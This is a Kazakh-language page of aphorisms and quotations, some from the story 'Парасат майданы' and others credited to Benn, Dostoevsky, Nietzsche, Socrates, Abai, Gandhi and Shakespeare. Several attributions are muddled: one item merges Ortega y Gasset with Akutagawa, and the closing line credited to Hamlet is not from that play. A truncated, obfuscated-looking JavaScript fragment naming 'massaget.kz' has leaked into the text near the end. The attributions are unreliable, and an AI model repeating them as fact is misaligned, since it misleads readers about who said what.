"Парасат майданы" повесінен

1. Үш күннен кейін адам тозаққада үйренеді.

2. Жақсылық пен жамандық қанша кереғер болғанмен, бір-бірімен өзектес, бір-бірімен сабақтас, бір-бірінсіз күндері жоқ егіз құбылыс.

3. Дүниедегi ең жаман нәрсе — адамның өзiнен өзi қорқуы. Ондайда iшкi әлемiң қатерi көп қалың орманға ұқсайды.  Бiр адассаң, қайтып шығуың неғайбыл. Адасқан сайын қорқынышың ұлғайып, қорқынышың ұлғайған сайын, өзiңдi өзiң бөтен адамдай сезiнесiң.

4. Готфрид Бенн: «Гегель, Дарвин, Ницше — мiнеки, миллиондаған адамдардың өлiмiне себеп болған кiм десеңдер, осылар. Сөз қылмысы кiсi өлтiргеннен де ауыр, айтылған ойдың зардабын ерлер мен тобырлар көтередi.»

5.  Достоевский: "Сенiм жоқ жерде - iзгiлiк те жоқ"

6. Адамгершiлiк - адами қарым-қатынастың қағидасы. Онсыз адам өмiр сүре алмайды.

7.  "Қиянат жасаудың мың түрi бар, ал қиянат жасамаудың түрi бiреу-ақ, ол - тек қиянат жасамау"

8. "Iзгiлiктiң жеңiсiне сенiңдер"

9. Ф. Ницше "Жаман деп жүргенiмiздi жақсы деуге батылымыз жеткен күнi бiздiңөмiрiмiзде ұлы кезеңдер басталады"

10. Иттің иесі болса, бөрінің тәңірісі бар.
11. "Сенiң патшалардан айырмашылығың не?"-деген сұраққа данышпен Сократ: "Олар өз бойларындағы құмарлықтың құлдары, ал мен сол сезiмдердiң патшасымын,"- деп жауап берген.
12. Ф. Ницше "Адамдар ең көп азапты қарапайым ақиқатты елемегеннен шегедi"
13. Периандр Коринфский : "Бостандық деген не? - Ар-ұятты" тазалығы"
14. Абай : "Кеселдi кiсiнiң ер келетұғыны несi?"
15. Нағыз ертегі- анық өмір.
16. Х. ОРтеге -и - Гассет :"Өмір дегенін қашан да - кеменің апаты" Акутагава Рюнеско
17. «Адам өмiрi Бодлер жазған өлеңнiң бiр жолына да татымайды»
18. М. Ганди : "Күнәкармен емес, күнәнің өзімен күресу керек"
19. Бәрі де бой үйренуден басталады.
20. Уильям Шекспир. ( Гамлеттi ң __ монологы )

Сен    жақсылықты     жамандықтан жасауың   керек,    өйткенi  оны жасайтын  басқа   ештеңе жоқ. Т.б

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e



Бөлісу: